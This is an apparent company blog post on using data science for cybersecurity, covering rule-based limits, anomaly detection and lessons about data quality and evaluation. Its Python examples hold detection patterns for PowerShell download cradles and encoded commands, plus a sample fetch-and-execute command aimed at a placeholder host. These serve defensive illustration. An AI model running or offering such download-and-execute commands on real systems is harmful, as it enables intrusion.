Data Science for Cybersecurity

Alicja Dobrzeniecka & Marvin Straathof

Sep 4, 2023 3:08:18 PM

Cyber attacks can cause devastating financial loss and can harm both organisations and individuals. In cybersecurity, new data points arrive every day. There is a lot of data, but when analysts look at it sample by sample, there is no guarantee that all available insights are captured. If we could harness these insights, we could better prepare for attacks and potentially reduce their consequences. The aim of this article is to provide an overview of some existing challenges in cybersecurity, which we can potentially address using data science.

The power of the data science approach lies in looking at large samples of data as a whole and trying to uncover the overall patterns. Data science is the process of extracting insights, patterns and useful information from data to solve problems and make informed decisions. There is a growing interest in applying data science and machine learning solutions to the cyber security domain, in order to prevent malicious activity within a network.


In this article we also share part of our journey at Hunt & Hackett, where we had previous experience in applying data science to various domains, but not to cybersecurity. We show what we have learned from our attempts to combine data science with cybersecurity. By sharing our experiences, we hope to help future data scientists better prepare for the challenges of cybersecurity.

Addressing Cybersecurity Challenges with Data Science

Traditional cybersecurity solutions include rule-based detection, where predefined rules are set up to detect specific types of malicious activity or attack patterns. These more traditional cybersecurity methods have limitations:

Limitations

[Predefined detection rules] - They rely on predefined, often manually created rules, and as cyber threats evolve rapidly, these rules may not cover all possible attack scenarios (e.g. novel or zero-day attacks).
[Balancing true & false positives] - It is a challenge to create rules that are both specific enough to detect threats and general enough to avoid false positives. As a result, some rules may generate too many false positives.
[Necessity of rule maintenance] - Rules may need to be adjusted over time, and maintaining and updating them on a regular basis is energy- and time-consuming.
[Detection blind spots exist] - There are blind spots because rule-based detection focuses on specific aspects of cyber security, which means it may miss attacks that exploit vulnerabilities outside the scope of the rules.

There are a number of challenges that can potentially be addressed with a more data-driven approach. These include:

Opportunities

[Intrusion Detection] - We can use anomaly detection algorithms to build models that can detect deviations from normal network behaviour, where unusual patterns could indicate potential intrusions.
[Malware Detection] - We can use machine learning approaches to train models to detect malware based on features extracted from files, network traffic or system behaviour.
[Fraud Detection] - We can apply anomaly detection techniques to identify unusual patterns, for example in transactions or account activity, that may indicate fraud.
[Phishing Detection] - We can use natural language processing to analyse email content and identify suspicious or phishing-related keywords, links, and patterns that deviate from normal behaviour.
[Vulnerability Assessment] - We can use machine learning algorithms to predict potential vulnerabilities based on historical data and system configuration.
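To make the anomaly detection idea concrete, here is a minimal sketch that uses only the Python standard library. It assumes a single numeric feature (hourly outbound connection counts for one host, which are made-up values) and a z-score threshold of 3.0. Both the feature and the threshold are illustrative assumptions, not something we used in production; a real model would look at many features at once.

```python
from statistics import mean, stdev

def fit_baseline(values):
    """Summarise 'normal' behaviour as a mean and a sample standard deviation."""
    return mean(values), stdev(values)

def is_anomalous(value, baseline, threshold=3.0):
    """Flag a value whose z-score exceeds the (assumed) threshold."""
    mu, sigma = baseline
    if sigma == 0:
        # No variation was observed, so any different value is a deviation.
        return value != mu
    return abs(value - mu) / sigma > threshold

# Hypothetical hourly outbound connection counts for one host.
normal_counts = [42, 38, 45, 40, 39, 44, 41, 43, 37, 46]
baseline = fit_baseline(normal_counts)

# Check one typical value and one extreme value against the baseline.
flags = {count: is_anomalous(count, baseline) for count in (44, 400)}
```

With this baseline, a count of 44 stays within the normal range while a count of 400 is flagged. An unusual value is only a hint that something may be wrong, so flagged samples still need to be reviewed by an analyst.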

The cyber security landscape is dynamic. New ideas and techniques for hacking systems can emerge unexpectedly. Attackers can also take advantage of available machine learning solutions. Using data science approaches to detect malicious behaviour can provide a way to update existing solutions with new data. As an organisation's network changes over time, the model can keep pace by using new data. If the infrastructure is well prepared, deploying a new version of a model can be relatively simple compared to updating manually created rules.

This doesn't mean that manually created rules are useless, but each solution has a specific problem space for which it works best. The addition of data science fills a problem space that is difficult to solve with traditional rules. This also means that traditional rules can be used by data science as one of the inputs. Ultimately, a layered approach to intrusion detection should be adopted. This means selecting the best solution for each specific problem space. This may include a single method or more complex ensemble methods to tackle problems with different approaches at different stages.
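One way to picture such a layered setup is sketched below. The two rules, the `layered_verdict` function, the verdict names and the 0.8 threshold are all hypothetical, and the anomaly score is assumed to come from some separately trained model that outputs a value between 0 and 1. The sketch only shows how rule hits and a model score could be combined, not how either layer should be built.

```python
import re

# Hypothetical hand-written rules; real detection rules would be far richer.
RULES = {
    "encoded_command": re.compile(r"-enc(odedcommand)?\b", re.IGNORECASE),
    "download_cradle": re.compile(r"downloadstring|invoke-webrequest", re.IGNORECASE),
}

def rule_hits(command_line):
    """Return the names of the rules that match a command line."""
    return [name for name, pattern in RULES.items() if pattern.search(command_line)]

def layered_verdict(command_line, anomaly_score, anomaly_threshold=0.8):
    """Combine rule hits with a model score (assumed to lie in [0, 1])."""
    hits = rule_hits(command_line)
    model_flag = anomaly_score >= anomaly_threshold
    if hits and model_flag:
        return "alert"   # both layers agree
    if hits or model_flag:
        return "review"  # only one layer fired
    return "ignore"

verdict = layered_verdict("powershell -enc SQBFAFgA", anomaly_score=0.95)
```

The rule hits could equally be passed to the model as input features instead of being combined with its output afterwards. Which design works best depends on the problem space.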

What surprised us during the process?

While working on our data science for cyber security projects, we came across a number of challenges that seemed strongly related to the cyber domain.

A/ Data quality

Initially, we focused on collecting benign and malicious examples for our problem, with the idea of doing supervised learning. We thought that we could collect a good representation of malicious examples to train a model to distinguish between normal and abnormal behaviour. It turned out that both private and public datasets contain far fewer malicious examples than we expected. For example, from the Nishang public dataset we were able to extract only about 200 malicious PowerShell command lines. It now seems that unsupervised or self-supervised approaches may be better suited to many cyber tasks. Because malicious events are quite rare and "normal" data is plentiful, it may be more appropriate to train a model to learn the patterns of normal behaviour and then flag any new sample that deviates significantly from them as anomalous.
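As an illustration of learning only from "normal" data, the sketch below fits a very simple token frequency model on benign command lines and scores new samples by how unfamiliar their tokens are. The `NormalBehaviourModel` class, the whitespace tokenisation and the example commands are assumptions made for this sketch. It is not the model we built, and a realistic approach would need far more data and richer features.

```python
import math
from collections import Counter

class NormalBehaviourModel:
    """Unigram token model fitted on benign samples only (illustrative)."""

    def fit(self, benign_samples):
        self.counts = Counter(
            token for sample in benign_samples for token in sample.lower().split()
        )
        self.total = sum(self.counts.values())
        self.vocab_size = len(self.counts) + 1  # one extra slot for unseen tokens
        return self

    def score(self, sample):
        """Average negative log-probability per token; higher is less familiar."""
        tokens = sample.lower().split()
        if not tokens:
            return 0.0
        # Add-one smoothing so that unseen tokens get a small, non-zero probability.
        log_probs = [
            math.log((self.counts[token] + 1) / (self.total + self.vocab_size))
            for token in tokens
        ]
        return -sum(log_probs) / len(tokens)

# Hypothetical benign command lines standing in for historical "normal" data.
benign = [
    "get-childitem -path documents",
    "get-process -name explorer",
    "get-service -name spooler",
    "get-childitem -path temp",
]
model = NormalBehaviourModel().fit(benign)

familiar = model.score("get-process -name spooler")
unfamiliar = model.score("iex (new-object net.webclient).downloadstring('http://example.test/a')")
```

Here `unfamiliar` comes out higher than `familiar`, because none of its tokens appear in the benign data. A cut-off for "significantly deviates" would still have to be chosen, for example from the distribution of scores on held-out normal samples.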

B/ Data processing

Our initial assumption was that we could do the preparation and cleaning of the data more or less automatically, and that we would not run into problems with extracting features from the data. However, we did run into problems with one of the projects, where we wanted to classify whether a given command line was malicious or not. Preparing the command lines involved standardising them, removing noise and breaking them down into proper tokens that could be used as input features for a model. In the end, we had a pre-processing pipeline that was partly manually created to clean the data.
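The kind of pre-processing described above could look roughly like the following sketch. The placeholder patterns (IP addresses, long base64-like strings, numbers) and the tokenisation regex are assumptions chosen for illustration and are not our actual pipeline. In particular, the base64 pattern is deliberately crude and would also replace any other run of 20 or more letters and digits.

```python
import re

# Hypothetical noise patterns; the order matters because later patterns
# run on text that has already been partly replaced.
PLACEHOLDERS = [
    (re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"), "<ip>"),
    (re.compile(r"[A-Za-z0-9+/]{20,}={0,2}"), "<b64>"),
    (re.compile(r"\b\d+\b"), "<num>"),
]

def normalise(command_line):
    """Replace high-variance values with placeholders, then lowercase."""
    text = command_line.strip()
    for pattern, placeholder in PLACEHOLDERS:
        text = pattern.sub(placeholder, text)
    return text.lower()

def tokenise(command_line):
    """Split a normalised command line into placeholder and word-like tokens."""
    return re.findall(r"<\w+>|[\w.\-]+", normalise(command_line))

tokens = tokenise(
    "PowerShell.exe -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA -Port 8080 10.0.0.5"
)
```

For the example command this yields the tokens `powershell.exe`, `-enc`, `<b64>`, `-port`, `<num>` and `<ip>`. Choices such as what to replace and where to split are exactly the manual decisions that can change what a model sees.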

C/ Evaluation challenges

For tasks that involve predicting the type of a connection within a network, whether it is normal or abnormal, we encountered the problem of a limited amount of labelled data for evaluation. For an unsupervised model, we assume (e.g. after verification with cyber experts) that a part of the historical data represents "normal" behaviour. The challenge then becomes how to comprehensively evaluate the trained model to best understand its strengths and limitations. One possible solution is to generate a set of "normal" and "abnormal" samples, either automatically or manually with domain experts. However, this can be time-consuming and labour-intensive, so it should be planned into the project budget.
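Once a small labelled set exists, the model's predictions can be compared against it with a few standard metrics. The sketch below computes precision, recall and false positive rate. The `evaluate` function and the ten labelled samples are made up for illustration, and a real evaluation set would need to be much larger.

```python
def evaluate(labels, predictions):
    """Compare boolean labels and predictions, where True means 'abnormal'."""
    pairs = list(zip(labels, predictions))
    tp = sum(1 for label, pred in pairs if label and pred)
    fp = sum(1 for label, pred in pairs if not label and pred)
    fn = sum(1 for label, pred in pairs if label and not pred)
    tn = sum(1 for label, pred in pairs if not label and not pred)

    def ratio(numerator, denominator):
        # Return 0.0 instead of failing when a class is absent.
        return numerator / denominator if denominator else 0.0

    return {
        "precision": ratio(tp, tp + fp),
        "recall": ratio(tp, tp + fn),
        "false_positive_rate": ratio(fp, fp + tn),
    }

# Hypothetical evaluation set: 2 abnormal and 8 normal samples.
labels = [True, True, False, False, False, False, False, False, False, False]
predictions = [True, False, True, False, False, False, False, False, False, False]
metrics = evaluate(labels, predictions)
```

In this toy example the model finds one of the two abnormal samples and raises one false alarm, giving a precision and recall of 0.5 and a false positive rate of 0.125. Because abnormal samples are rare, accuracy alone would look deceptively high, which is why these three metrics are reported separately.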

D/ Importance of domain expertise

To work effectively with data, it is essential to have at least a basic understanding of the cyber security landscape. However, even after grasping the basic concepts, we often find ourselves relying on the expertise of cyber domain experts at different stages of projects. The cyber security domain can be challenging, especially for beginners. As data scientists, we may spend a lot of time immersed in it, but certain intricacies can only be fully understood with the guidance of an expert. Some corner cases may depend on specific contexts and require a broader understanding of the domain for proper interpretation.

Conclusion

In our journey so far we have encountered a number of challenges that have led to many lessons and ideas for the future. To deal with the limited number of malicious examples, we think a good research direction is to pursue unsupervised approaches that model historical "normal" behaviour and detect suspicious deviations from it. Data processing made us aware that there are many ways to standardise cyber data and that the choice of method can directly affect the results. We also found that, in order to further understand and improve a model, it may be necessary to work closely with cyber domain experts, sharing thoughts on progress so far and analysing corner cases together.

Finally, if you're a data scientist yourself, should you get into cybersecurity? If you like challenges, cybersecurity data science is a rewarding experience. Working with cyber data exposes you to real-world challenges that you wouldn't normally encounter when working with data that is simple, clean and readily available. By overcoming these challenges, you can gain valuable insights and develop a more realistic understanding of what it really means to be involved in data science. It will allow you to expand your skill set and navigate complex scenarios, ultimately enhancing your expertise in the field.

